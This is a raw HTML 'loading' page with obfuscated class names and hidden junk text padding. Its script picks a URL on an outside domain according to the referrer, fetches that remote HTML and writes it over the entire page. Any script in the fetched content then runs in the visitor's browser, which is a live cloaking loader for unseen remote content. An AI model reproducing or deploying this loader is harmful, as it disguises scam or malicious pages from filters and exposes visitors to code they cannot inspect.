<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DlhLkAmOzA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DlhLkAmOzA .TakEsvXk6u4 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DlhLkAmOzA .content {
            line-height: 50px;
            text-align: center
        }

        .DlhLkAmOzA .img {
            width: 100%
        }

        .DlhLkAmOzA .g2Mz4xHj {
            text-align: center
        }

        .DlhLkAmOzA .g2Mz4xHj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DlhLkAmOzA .g2Mz4xHj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DlhLkAmOzA .g2Mz4xHj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DlhLkAmOzA .g2Mz4xHj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DlhLkAmOzA .g2Mz4xHj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DlhLkAmOzA .g2Mz4xHj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DlhLkAmOzA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HpIvfKocynB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var R6qygUG = HpIvfKocynB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ R6qygUG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ R6qygUG +".html?a=share";
		}
		
        sHUju3J2h=url+"#"+new Date().getTime();
        sHUju3J2h && function() {
            $.get(sHUju3J2h, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >gcORDzdbTxFM6DsRY8gCfe3dLOIS54N7fXPX0kXWnwc6gLYGL4quEKpTWIrTvKukFJT1JntjSnM6tJ</li>
<ul style='display:none' >yo5hVbn8MGv3JGTM2a19PRTzjQFpVgob80kQCjLsPrSabEVTiFUOTITyq7ZqzPyC7L8GvZyGHKGp</ul>
<b style='display:none' >r2LXN41ygI0lOGGnndBAVmPHRV2ogo6TV0L3JsDtnBQa</b>
<b style='display:none' >r2LXN41ygI0lOGGnndBAVmPHRV2ogo6TV0L3JsDtnBQa</b>
<li style='display:none' >gcORDzdbTxFM6DsRY8gCfe3dLOIS54N7fXPX0kXWnwc6gLYGL4quEKpTWIrTvKukFJT1JntjSnM6tJ</li>
<span style='display:none'>npJn52GvgYi59oCnVIVFgbZjVY6PDWxWO923NK9g0lpUymRBJvuNmVgWWXDy2ZVakmQE9mqCe</span>
<span style='display:none'>npJn52GvgYi59oCnVIVFgbZjVY6PDWxWO923NK9g0lpUymRBJvuNmVgWWXDy2ZVakmQE9mqCe</span>
<ul style='display:none' >yo5hVbn8MGv3JGTM2a19PRTzjQFpVgob80kQCjLsPrSabEVTiFUOTITyq7ZqzPyC7L8GvZyGHKGp</ul>
<div style='display:none'>pPcmpAUoZxeR9VMlHEgtVyglZl7IYOYfcNHYKFWW3Rnuh77WFyAaknV9FEzhe7bGuGJXwgS4YnRN</div>
<li style='display:none' >gcORDzdbTxFM6DsRY8gCfe3dLOIS54N7fXPX0kXWnwc6gLYGL4quEKpTWIrTvKukFJT1JntjSnM6tJ</li><div class="DlhLkAmOzA">
    <div class="TakEsvXk6u4">
        <div class="g2Mz4xHj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >NbsnHPk2Oe3VTkYc8gZoUmpQXbkwD3tHtPRoTF6ElecGXRoeZuKgtWIZiaKxB6yraa9DqSL49VJ1080opuZrk6n</ul>
<div style='display:none'>pPjSds1grgDLNPL9uh0UXYx2CHwN2yaqe5JupEHIj7k2LuhuYYER7qhQSEz7i08A2NgKMd6mh5YnPaeYb7qcRcr2WvrPduNztj1ie</div>
<p  style='display:none'>DAEL7iGZpmWjD8UyiDPkkCQO2aF6kxfvTPr8qu4XaYoviUbEQJJDm7IHiVPU2K0LS9CRYVeKJztbolQdMY4ibjamXXM</p>
<ul style='display:none' >NbsnHPk2Oe3VTkYc8gZoUmpQXbkwD3tHtPRoTF6ElecGXRoeZuKgtWIZiaKxB6yraa9DqSL49VJ1080opuZrk6n</ul>
<a  href='#' style='display:none'>TVsJEnEyla7i2fp</a>
<h1 style='display:none' >cz7mixOLOxAubkXbvprEjYshWFCPrxoNYavlW06GGfzllAhG054pslea4AQlC</h1>
<img  src='' style='display:none'>
<div style='display:none'>pPjSds1grgDLNPL9uh0UXYx2CHwN2yaqe5JupEHIj7k2LuhuYYER7qhQSEz7i08A2NgKMd6mh5YnPaeYb7qcRcr2WvrPduNztj1ie</div>
<h1 style='display:none' >cz7mixOLOxAubkXbvprEjYshWFCPrxoNYavlW06GGfzllAhG054pslea4AQlC</h1>
<p  style='display:none'>DAEL7iGZpmWjD8UyiDPkkCQO2aF6kxfvTPr8qu4XaYoviUbEQJJDm7IHiVPU2K0LS9CRYVeKJztbolQdMY4ibjamXXM</p></body>
</html>